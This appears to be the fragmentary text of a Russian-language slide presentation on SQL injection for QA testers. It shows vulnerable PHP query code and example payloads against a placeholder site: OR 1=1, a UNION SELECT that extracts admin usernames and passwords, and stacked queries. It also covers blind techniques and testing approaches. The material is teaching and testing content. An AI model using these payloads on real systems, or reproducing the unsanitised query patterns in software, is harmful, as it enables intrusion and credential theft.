SQL-injections презентация

внедрении в запрос произвольного SQL-кода.

$id");
http://site.com/news.php?id=5
SELECT * FROM news WHERE id_news = 5

http://site.com/news.php?id=-1+OR+1=1
SELECT * FROM news WHERE id_news = -1 OR 1=1

FROM news WHERE news_caption LIKE('%$search_text%')");
http://site.com/news.php?search_text=qwerty

SELECT id_news, news_date, news_caption, news_text, news_id_author FROM news WHERE news_caption LIKE('%Test%')

')+and+(news_id_author='1

SELECT id_news, news_date, news_caption, news_text, news_id_author FROM news WHERE news_caption LIKE('%') AND (news_id_author='1%')

news WHERE id_news = " . $_REQUEST['id']);

-1 UNION SELECT 1, username, password, 1 FROM admin

SELECT id_news, header, body, author FROM news WHERE id_news = -1 UNION SELECT 1, username, password, 1 FROM admin

типа и версии используемой СУБД.
Определение уязвимостей, специфичных для данной версии.
Определение особенностей СУБД.
Определение дальнейшего вектора атаки

параметр HTTP-запроса добавляется точка
с запятой (;) и следом внедряемый SQL-
запрос.

SELECT id_news, header, body, author FROM news WHERE id_news = -1; SELECT username,password FROM admin

изменение времени обработки при изменении запроса

Boolean-based

прав пользователей, имен таблиц и т.д.
QA:
Тестирование вручную – на основании знаний о системе и выполняемых ею функций

Автоматизированные тестирование – с использованием сканеров для определения потенциально опасных функций и/или возможности эксплуатации определенных функций

тестирования «общими» сканерами
стремится к 0.

Варианты решения:
Ручное тестирование
Ревъю кода
Использование узкоспециализированных либо «самописных» средств

использовании
бесплатность

Недостатки:
Необходимость предварительного ручного тестирования (поиск потенциальных слабостей)
Необходимость минимальных технических навыков
Требуется понимание принципов инъекций и их использования